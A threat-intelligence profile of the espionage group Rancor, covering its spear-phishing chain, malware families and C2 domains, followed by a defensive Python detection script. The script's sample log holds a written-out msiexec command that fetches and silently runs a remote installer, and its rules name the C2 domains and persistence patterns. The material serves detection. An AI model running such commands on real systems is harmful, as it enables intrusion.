Cyber Threat Actor: Rancor
| Actor Type | Location | Known Incidents |
|---|---|---|
| Spy | China | 1 incident |
Profile
Rancor is a cyber espionage group that is publicly tracked under the name Rancor and is assessed to operate from China. Its activity has been observed primarily in Southeast Asia, with a focus on government entities in Cambodia. Public reporting describes Rancor as conducting espionage‑motivated operations aimed at gathering sensitive information from targeted administrations; the objectives are explicitly characterized as intelligence collection rather than financial gain or disruption.
The group’s typical initial access vector is spear‑phishing email carrying weaponized documents that lure the recipient into enabling malicious content. Once the user enables the embedded macro, the Dudell malware family executes and downloads a secondary payload via msiexec. The DDKONG remote access Trojan is then deployed; it creates a hidden window to evade detection before establishing communication with command‑and‑control servers at domains such as cswksfwq.kfesv.xyz and connect.bafunpda.xyz. The Derusbi backdoor Trojan rounds out the chain: it requires a decryption key to run and persists through Windows registry modifications. Together, these custom malware families illustrate a tooling style built on macro‑based delivery, stealthy communication, and registry‑based persistence.
A representative operation attributed to Rancor occurred between December 2018 and January 2019, when the group targeted Cambodian government officials with the described spear‑phishing chain. During this campaign, the attackers leveraged the three malware families to gain unauthorized access to systems and exfiltrate data, using the aforementioned C2 domains for covert communication. Security researchers noted that blocking those domains and updating threat prevention platforms to detect Dudell, DDKONG, and Derusbi were effective mitigations against the activity. This incident underscores the group’s focus on sustained access to governmental networks in the region for intelligence collection.
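The mitigations above (blocking the named C2 domains, detecting the tool chain) can be approximated in a simple detection pass over endpoint telemetry. The following is an added example written for this page, not code from the original reporting or from any vendor product. The only indicators taken from the page are the two C2 domains; the Office process names, the `msiexec` download heuristic, the registry Run key pattern, and the JSON-lines event format are generic assumptions, and the sample log lines are constructed for illustration.

```python
"""Toy detection pass for the Rancor-style intrusion chain described above.

Constructed example for this page: the log lines in SAMPLE_LOG are made up,
in a simplified JSON-per-event format, and are not real telemetry from the
campaign.  Only RANCOR_C2_DOMAINS comes from the public reporting summarised
here; every other indicator is a generic heuristic assumption.
"""
import json
import re
from urllib.parse import urlsplit

# Domains named in the public reporting summarised on this page.
RANCOR_C2_DOMAINS = {"cswksfwq.kfesv.xyz", "connect.bafunpda.xyz"}

# Assumption: Office binaries that would host a malicious macro.
OFFICE_PROCESSES = {"winword.exe", "excel.exe", "powerpnt.exe"}

# Assumption: registry Run/RunOnce keys commonly used for persistence.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\", re.I)

URL_RE = re.compile(r"https?://[^\s\"']+", re.I)

# Constructed sample telemetry (one JSON object per line). Events 1, 3 and 5
# model the chain on this page; events 2, 4 and 6 are benign noise.
SAMPLE_LOG = r"""
{"id": 1, "type": "process", "parent_image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "image": "C:\\Windows\\System32\\msiexec.exe", "command_line": "msiexec.exe /i http://203.0.113.10/update.msi /q"}
{"id": 2, "type": "process", "parent_image": "C:\\Windows\\explorer.exe", "image": "C:\\Windows\\System32\\notepad.exe", "command_line": "notepad.exe notes.txt"}
{"id": 3, "type": "dns", "query": "cswksfwq.kfesv.xyz"}
{"id": 4, "type": "dns", "query": "www.example.com"}
{"id": 5, "type": "registry", "target_object": "HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SysHelper"}
{"id": 6, "type": "registry", "target_object": "HKLM\\SOFTWARE\\Example\\Setting"}
"""


def load_events(text):
    """Parse JSON-lines telemetry, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def _domain_matches(host):
    """True if host is a known C2 domain or a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in RANCOR_C2_DOMAINS)


def detect(events):
    """Return (rule_name, event_id) findings for the given events."""
    findings = []
    for ev in events:
        kind = ev.get("type")
        if kind == "process":
            parent = _basename(ev.get("parent_image", ""))
            image = _basename(ev.get("image", ""))
            cmd = ev.get("command_line", "")
            # Macro -> msiexec fetching a remote installer (Dudell stage).
            if parent in OFFICE_PROCESSES and image == "msiexec.exe":
                urls = URL_RE.findall(cmd)
                if urls:
                    findings.append(("office_spawns_msiexec_with_url", ev["id"]))
                    for url in urls:
                        if _domain_matches(urlsplit(url).hostname or ""):
                            findings.append(("known_rancor_c2_domain", ev["id"]))
        elif kind == "dns":
            # Resolution of a published C2 domain (DDKONG beaconing).
            if _domain_matches(ev.get("query", "")):
                findings.append(("known_rancor_c2_domain", ev["id"]))
        elif kind == "registry":
            # Run-key write (registry-based persistence, as with Derusbi).
            if RUN_KEY_RE.search(ev.get("target_object", "")):
                findings.append(("run_key_persistence", ev["id"]))
    return findings


def run_sample():
    """Run the detections over the constructed sample log."""
    return detect(load_events(SAMPLE_LOG))


if __name__ == "__main__":
    for rule, event_id in run_sample():
        print(f"event {event_id}: {rule}")
```

The domain rule is the one grounded in the page; the process and registry rules are broad by design and will fire on legitimate software installs and autostart entries, so in practice they are suppression-tuned and correlated on the same host within a short window rather than alerted on individually.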
